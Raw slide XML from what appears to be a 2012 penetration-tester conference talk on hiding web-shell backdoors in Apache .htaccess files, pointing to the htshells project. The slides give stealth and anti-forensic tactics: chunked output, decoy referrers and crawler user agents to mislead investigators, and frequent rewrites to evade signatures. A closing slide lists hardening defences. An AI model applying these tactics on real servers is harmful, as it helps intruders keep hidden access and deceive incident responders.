            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Large </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>response bodies can cause the header to exceed the maximum size defined when compiling Apache (default 8190), the best way to get around this is to store the command output in the session and return it one chunk at a time.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Divert the investigator by presenting a likely scenario, if there is an existing file, such as a picture. Hotlink the image from a public forum and use the forum url as referrer value and use a known aggressive crawler as the user agent.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Systems </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>that log response length as headers and response body will show varying content length for the shell requests, this is not the default apache behaviour and requires additional modules to be enabled.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0AB0CFA9-89F7-401B-8A8C-4C85A1343609}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1844768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Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRP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Backdoors are easy to write and hide</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This is just a small sample of what is possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Rewrite shell frequently to avoid signature based detection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Defending </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>against backdoors isn’t too hard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Custom .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>htaccess</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> filename</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>hardening</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>LogFormat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> %0</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="522288" lvl="1" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Code available from my </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>htshells</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> project</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="358775" lvl="3" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>github.com/wireghoul/htshells</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3652299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Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Conspiracy Keanu - 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9" y="1340769"/>
            <a:ext cx="5040560"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87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90B242A-6905-435F-94BB-D746A842F2C4}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:pPr fontAlgn="base">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPct val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Content Placeholder 12"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="1600200"/>
            <a:ext cx="4333875" cy="2044700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Contact details</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>BAE Systems Detica</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Suite 1, 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Geils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Court</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Deakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ACT 2600</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Australia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Tel: +61 1300 027 001</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Fax: +61 2 6260 8828</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>australia@baesystemsdetica.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Web: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>www.baesystemsdetica.com.au</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Content Placeholder 13"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="238125" y="3978275"/>
            <a:ext cx="4333875" cy="2044700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Copyright</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>© Stratsec.net Pty Ltd (2012).  All Rights reserved.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>BAE Systems and DETICA are trade marks of BAE Systems plc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Other company names, trade marks or products referenced herein are the property of their respective owners and are used only to describe such companies, trade marks or products.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Stratsec.net Pty Limited, trading as ‘BAE Systems Detica’, is registered in</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t>Australia under ACN 111 187 270 and has its registered office at 50 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Geils</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> Court, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1" smtClean="0"/>
              <a:t>Deakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0"/>
              <a:t> ACT 2600.</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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>About me</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AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Penetration tester</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Dad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Written some open source security tools</a:t>
            </a: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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5811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Proposal</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-AU" sz="3600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-AU" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Stealth backdoors have legitimate uses</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{0AB0CFA9-89F7-401B-8A8C-4C85A1343609}" type="slidenum">
              <a:rPr lang="en-GB" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1889150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eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Stealth objective</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AU" dirty="0" smtClean="0"/>
              <a:t>No bad function calls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Hidden payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Avoid WAF/IDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>Limited </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>forensic evidence</a:t>
            </a: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5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3886433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Objective: No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>bad function calls</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No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>No </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0"/>
              <a:t>passthru</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>No exec</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0"/>
              <a:t>No system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>No ``</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>No base64_decode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a: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6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1288763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Objective: Hidden </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>file</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Hide backdoor on </a:t>
            </a:r>
            <a:r>
